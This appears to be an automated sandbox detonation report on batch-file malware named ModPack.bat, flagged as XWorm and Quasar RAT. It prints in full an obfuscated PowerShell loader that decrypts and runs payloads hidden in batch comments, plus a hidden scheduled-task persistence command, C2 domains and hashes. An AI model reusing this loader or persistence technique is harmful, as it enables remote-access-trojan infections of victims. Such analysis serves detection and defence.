"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_462_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_462.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_462.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_462.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_462.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_462.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 147.185.221.19:27030 | china-earth.gl.at.ply.gg | tcp |
| US | 147.185.221.19:14568 | china-earth.gl.at.ply.gg | tcp |
| US | 147.185.221.19:27030 | china-earth.gl.at.ply.gg | tcp |
| DE | 195.201.57.90:443 | ipwho.is | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bof1uym4.45m.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4828-8-0x0000021C75840000-0x0000021C75862000-memory.dmp
memory/4828-9-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
memory/4828-10-0x0000021C75700000-0x0000021C75710000-memory.dmp
memory/4828-11-0x0000021C75700000-0x0000021C75710000-memory.dmp
memory/4828-12-0x0000021C75830000-0x0000021C75838000-memory.dmp
memory/4828-13-0x0000021C75AE0000-0x0000021C75C82000-memory.dmp
memory/4332-15-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
memory/4332-16-0x0000025865B50000-0x0000025865B60000-memory.dmp
memory/4332-17-0x0000025865B50000-0x0000025865B60000-memory.dmp
memory/4332-26-0x0000025865B50000-0x0000025865B60000-memory.dmp
memory/4332-29-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb15ee5741b379245ca8549cb0d4ecf8 |
| SHA1 | 3555273945abda3402674aea7a4bff65eb71a783 |
| SHA256 | b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636 |
| SHA512 | 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\startup_str_750.vbs
| MD5 | 5b5871d2529094b78a49750b45ea5f47 |
| SHA1 | c16477f999f91c6fca245bc44960b08e5bab7cc5 |
| SHA256 | 4ec3b80d570e07948ea72aecb87d80bf4805d1c32ec1737ea00f1b6ad8adeb9c |
| SHA512 | b657829cd2d72cddd71e5603b15baa3b86c77fbd65ea50fb65d06f900d5ed272a922084235861ac4260f72f2f682909af997e7142110801349798dbf41849733 |
C:\Users\Admin\AppData\Roaming\startup_str_750.bat
| MD5 | 51d7b8be303abf43851e767d9250887b |
| SHA1 | e795e381647c8a99529f87810347881b6b9bdeba |
| SHA256 | e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d |
| SHA512 | 1ee6999e72bafb69559c1dbeb6ff84e46f94fe1b51a82626d7feabce5619053299872d680520aac791e103a3fb45a6d002180cc166215c59517e6c72dae6ee26 |
memory/3508-46-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
memory/3508-48-0x000001AA2D240000-0x000001AA2D250000-memory.dmp
memory/3508-49-0x000001AA2D240000-0x000001AA2D250000-memory.dmp
memory/4828-50-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
memory/3508-53-0x000001AA2D550000-0x000001AA2D55E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ModPack.bat
| MD5 | 105f33324f5807a250699b78a8972954 |
| SHA1 | c7e43ef81256e582a290a84a387a2163e35de9fb |
| SHA256 | 636bf2c51b857661bf1125085ee11bc28cf2d8f2cdaa5d44135dd8d87a52a4b5 |
| SHA512 | 162dabf9630be54a2c6775d9f928be6923462b211d9072752341bcdaeae8099b0d49b6710bedd13f894cc72742336728365b44e8f282622487d11fcc9cdc7101 |
memory/2864-65-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
memory/2864-66-0x00000237BA420000-0x00000237BA430000-memory.dmp
memory/2864-67-0x00000237D4770000-0x00000237D4778000-memory.dmp
memory/2864-68-0x00000237D4780000-0x00000237D48B2000-memory.dmp
memory/3868-78-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
memory/3868-79-0x000001E0310B0000-0x000001E0310C0000-memory.dmp
memory/3868-80-0x000001E0310B0000-0x000001E0310C0000-memory.dmp
memory/3868-81-0x000001E0310B0000-0x000001E0310C0000-memory.dmp
memory/3868-83-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9665f44079e2ed28b3d426623291b219 |
| SHA1 | cc9ed0d8ffbb49e98034acca27f073b6db66032b |
| SHA256 | 6c8f1b0f7f78cbb20b1f0d8a41d80f47feb831ebb9ac64f3a868d3d124d4edfb |
| SHA512 | 86c4ed22bbaeeb12d53f547559d55121f5401bf3c830be67b7504b60e057d93ab88d65cbd59425e4be7fb5addc013a9115ec732afb101bf8500c438024ba1c0a |
C:\Users\Admin\AppData\Roaming\startup_str_462.vbs
| MD5 | fbca8f20e020c40f9a96b1b8eec2ec45 |
| SHA1 | 6aa4eb6de07215aa102e65e8fe94bec01b9faf5e |
| SHA256 | 6ed43ebd4b884bfb71fe6bb5022ca80da1e2697419b5e4cf9f9e2a1c5f1a3de5 |
| SHA512 | 01d4a1f2eec871858504376f5764ce6135bf1b31e3edfe20f359568899984c6aecc13169a17873b74fdf72d0f825991c18a14133f0c65aaed9e3cbcc121b08f9 |
memory/4052-91-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
memory/4052-93-0x000001F4692C0000-0x000001F4692D0000-memory.dmp
memory/4052-92-0x000001F4692C0000-0x000001F4692D0000-memory.dmp
memory/3508-103-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
memory/4052-104-0x000001F4692C0000-0x000001F4692D0000-memory.dmp
memory/2864-105-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
memory/4052-106-0x000001F4696A0000-0x000001F4699C4000-memory.dmp
memory/4052-107-0x000001F46A400000-0x000001F46A450000-memory.dmp
memory/4052-108-0x000001F46A510000-0x000001F46A5C2000-memory.dmp
memory/4052-109-0x000001F46A7A0000-0x000001F46A962000-memory.dmp
memory/3508-110-0x000001AA2D240000-0x000001AA2D250000-memory.dmp
memory/4052-111-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp
memory/4052-113-0x000001F4692C0000-0x000001F4692D0000-memory.dmp
memory/4052-112-0x000001F4692C0000-0x000001F4692D0000-memory.dmp
memory/4052-114-0x000001F4692C0000-0x000001F4692D0000-memory.dmp
memory/4052-115-0x000001F469B50000-0x000001F469B62000-memory.dmp
memory/4052-116-0x000001F46A490000-0x000001F46A4CC000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-13 20:16
Reported
2024-04-13 20:17
Platform
win10-20240404-en
Max time kernel
69s
Max time network
76s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModXPack.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModXPack.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_814_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_814.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_814.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_814.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_814.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_814.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ModPack.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_358_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_358.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_358.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_358.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_358.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_358.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.7.6.8.0.7.2.8.3.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | china-earth.gl.at.ply.gg | udp |
| US | 147.185.221.19:14568 | china-earth.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | notes-creation.gl.at.ply.gg | udp |
| US | 147.185.221.19:27030 | notes-creation.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:443 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/1932-4-0x0000017AD83F0000-0x0000017AD8412000-memory.dmp
memory/1932-7-0x0000017AD85A0000-0x0000017AD8616000-memory.dmp
memory/1932-8-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
memory/1932-9-0x0000017AD82B0000-0x0000017AD82C0000-memory.dmp
memory/1932-10-0x0000017AD82B0000-0x0000017AD82C0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2wtqtarg.lyt.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1932-21-0x0000017AD82B0000-0x0000017AD82C0000-memory.dmp
memory/1932-26-0x0000017AD8550000-0x0000017AD8558000-memory.dmp
memory/1932-27-0x0000017AD8860000-0x0000017AD8A02000-memory.dmp
memory/3832-36-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
memory/3832-38-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp
memory/3832-39-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp
memory/3832-54-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp
memory/3832-69-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp
memory/3832-73-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f45bad28bfc59e679ff291d807779e54 |
| SHA1 | 4743408f9529733b71f8859a6a396eb87eabed23 |
| SHA256 | 51df79556153f93c6640a441ac4d416d916056b7bdaec11a35d43dc2b4ca2aac |
| SHA512 | 960072afd129f4faef1f38771ad1eb737e582c1eacef6537d9323c75948f55fbddca0c0f73b47e30495fe047ddfbf6aab17acf9d2546316bec141244a21982a6 |
C:\Users\Admin\AppData\Roaming\startup_str_814.vbs
| MD5 | 723f0cfcb01b09604416e4b4ecd29a80 |
| SHA1 | dea4fc842041133cef8c0d1760bffd30bac7fb7e |
| SHA256 | 8c785d4441b59920cb35b2307eab9132d65c6f2320dcac5d7879ef64cfc2086b |
| SHA512 | e4ef5c4486b67e9d66d9c143cf91221a71e1c037859e7580b80b19ec3e4bb0051bca577b0d2dbad609fa5b34b650fab00ecb5e20b0f6171c638fec697d1f2806 |
C:\Users\Admin\AppData\Roaming\startup_str_814.bat
| MD5 | 51d7b8be303abf43851e767d9250887b |
| SHA1 | e795e381647c8a99529f87810347881b6b9bdeba |
| SHA256 | e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d |
| SHA512 | 1ee6999e72bafb69559c1dbeb6ff84e46f94fe1b51a82626d7feabce5619053299872d680520aac791e103a3fb45a6d002180cc166215c59517e6c72dae6ee26 |
memory/4516-90-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
memory/4516-91-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp
memory/4516-93-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp
memory/1932-94-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp
memory/4516-109-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp
